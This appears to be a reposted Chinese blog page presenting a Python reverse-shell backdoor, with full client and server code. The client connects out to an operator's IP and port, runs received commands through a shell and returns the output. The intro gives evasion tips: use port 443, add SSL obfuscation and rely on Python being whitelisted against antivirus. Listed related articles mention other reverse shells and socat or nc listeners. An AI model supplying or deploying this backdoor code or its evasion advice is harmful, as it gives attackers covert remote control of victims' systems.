python 反向shell后门

最新推荐文章于 2023-11-22 11:21:20 发布
最新推荐文章于 2023-11-22 11:21:20 发布
阅读量149 收藏 1
点赞数
文章标签: python shell 操作系统
原文链接:http://www.cnblogs.com/junsec/p/10439559.html
版权

  linux 编码改为utf-8,windows 默认gbk,python一般都是白名单减少查杀可能性,端口可以改为443,ssl混肴数据传输。

 

python client端

import subprocess,socket

def main():
    ip = "192.168.1.102"
    port = 6666
    # 建立socket
    shell_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    # connect连接
    shell_socket.connect((ip,port))
    # 接收数据
    while True:
        data = shell_socket.recv(1024).decode("gbk")
        # subprocess执行shell命令

        command = subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
        STDOUT,STDERR = command.communicate()
        # byte 类型区别于 python2.X
        # 发送输出命令

        shell_socket.send(STDOUT) # 直接发送bytes
    # 关闭socket
    shell_socket.close()

if __name__ == '__main__':
    main()

 

python server端:

import socket

def main():
    # 建立socke连接
    shell_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    # bind端口
    shell_socket.bind(("",6666))
    # listen监听 设置最大俩个连接
    shell_socket.listen(2)
    # accept 接收 发送命令
    new_shell,addr = shell_socket.accept()
    while True:
        command = input("~$")
        new_shell.send(command.encode("gbk"))
        # 显示 数据
        data = new_shell.recv(2048).decode("gbk")
        if data:
            print (data)
        else:
            break
    # 关闭连接
    new_shell.close()
    shell_socket.close()


if __name__ == '__main__':
    main()

 

执行结果:

 

转载于:https://www.cnblogs.com/junsec/p/10439559.html

weixin_30469895
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python反向连接shell,可穿透防火墙
07-30
python reverse_shell.py 反弹目的ip 3322 反弹目的ip 执行nc -l 3322 即可连结 被控端
反向链接--后门
zsms1314的博客
02-28 1254
1,安装socat库 (centos) yum install socat http://www.dest-unreach.org/socat/download/ socat库下载地址 2,安装方式 ./configure make make install 3,使用方式 server端 socat file:tty,raw,echo=0 tcp-listen:5081 client端 socat exec:‘bash -li’,pty,stderr,setsid,sigint,sane tcp:xx.xx
反向连接后门源码
JAVA天地
05-21 180
#include<winsock2.h>#include<stdio.h>#pragmacomment(lib,"ws2_32.lib")voidmain(intargc,char**argv){char*messages=" ========================BackConnectBackDoorV0.1========================...
安全之路 —— 零管道反向连接后门解析
雨者
03-05 1594
简介 根据前面两篇Blog介绍的双管道后门和单管道后门,他们的特点是一定需要建立管道以便进行进程间通信。但是能不能不需要管道呢?答案是可以的,这里需要借鉴重叠IO的思想,将程序中的socket函数替换成支持重叠IO的WSASocket函数。 核心知识点 si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sSock; 即将Socket...
Pythonshell.recv(9999) 返回值做是否含有关键词判断
qq_36882752的博客
05-06 912
shell.recv()返回值是一个字节对象。 而我一直在用 if in做关键词查找 if 'XXXX' in resp: 而这样的if语句是不对的,字符串类型和字节类型应该是无法做这个查找的,所以一直没有匹配成功。 if 'XXXX'.encode('utf-8') in resp: 将字符串转换为字节对象在去比较一下,应该就可以了。 ...
python IDLE shell 中文界面
05-16
标题提到的“python IDLE shell 中文界面”是指通过更换特定文件来将IDLE的界面语言切换为中文。这个过程涉及到对Python安装目录的修改,特别是针对`Lib`文件夹下的`idlelib`子目录。在描述中,博主指出他们使用的...
python编写shell脚本
07-17
### Python 编写 Shell 脚本:详细解析与实践 #### 一、引言 在日常工作中,Shell 脚本是一种非常实用的工具,它可以帮助我们自动化完成一系列任务,比如文件操作、数据处理等。然而,对于很多开发者而言,Shell ...
Python封装shell命令实例分析
09-22
主要介绍了Python封装shell命令,实例分析了Python将各种常用shell命令封装进一个类中以便调用的方法,非常具有实用价值,需要的朋友可以参考下
Reverse_DNS_Shell:使用DNS作为c2通道的python反向shell
05-03
DNShell v1.7描述: 使用DNS作为C2通道的Python反向Shell。要求: dnslib DNS服务器隐密Gotchyas: 别忘了更改您的主机别忘了更改您的SECRET密钥首先运行服务器摩尔信息:
python 实现反向输出链表
06-08
# 题目:反向输出一个链表。
反向连接后门代码
10-13
用C实现的反向连接后门代码。具有反向连接功能,服务器端通过域名解析向客户端发起建立连接请求。
python自动化运维封装paramiko和pexpect
dangdanding的专栏
07-25 555
python自动化运维封装paramiko和pexpect,利用execute_command_on_device()方法paramiko或者pexpect登录到设备并打开shell执行交互式命令。
paramiko STELNET登陆设备
最新发布
2301_76769137的博客
11-22 136
公司有一台CE12800的设备,管理地址位172.16.1.2,现在需要编写自动化脚本,通过ssh登陆到设备上并进行简单的信息查看。来自 172.16.1.2 的回复: 字节=32 时间=19ms TTL=255。来自 172.16.1.2 的回复: 字节=32 时间=7ms TTL=255。来自 172.16.1.2 的回复: 字节=32 时间=5ms TTL=255。数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失),最短 = 5ms,最长 = 19ms,平均 = 9ms。
Python用SSH连接交换机以及多命令输入(paramiko)
jhfytf的博客
04-08 4874
import paramiko #导入paramiko包 client = paramiko.SSHClient() #创建ssh对象 client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) #首次连接设备时会询问yes or no,自动选择yes client.load_system_host_keys() #加载之前的hosts...
解读华为Datacom认证网络自动化开发之批量备份配置
最铁头的网工博客
12-04 863
有备方能无患,网络在割接、变更、维护时都需要备份配置,手工备份一台设备需要几分钟,几十台设备的网络就需要几小时,因此网络自动化和智能化是必然的趋势。华为已发布了HCIP-Datacom-Network Automation Developer,定位于培养数据通信网络领域具备网络自动化开发专业知识和技能水平的高级工程师,下面就让我们探索其中一个知识点:用Python实现自动化批量备份配置。 案例描述: 如图所示,三台CE12800交换机连成一个环形网络,交换机管理层路由打通,交换机配置为密码认证的STel
反向连接后门的使用
djyangmaowei的专栏
05-29 1338
这是一个反向连接的源程序 通过对这个程序的研究我可以知道一个cmd shell是怎么建立并实现的这是一个单管道的程序 为此我还专门看了一下书中所讲的零管道和双管道用瑞士军刀进行监听 最后得到一个cmd shell是不是溢出攻击也是要用到这个哟 嘿嘿 幻想... #include#include#pragma comment(lib,"ws2_32.lib")void m
ShellPython基础操作指南
"这篇文档主要介绍了shell脚本的基础操作以及与Python的一些交互。文档涵盖了shell变量的定义、使用、命令替换、算术运算、只读变量、删除变量、以及从终端获取用户输入的方法。此外,虽然没有直接涉及Python内容,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值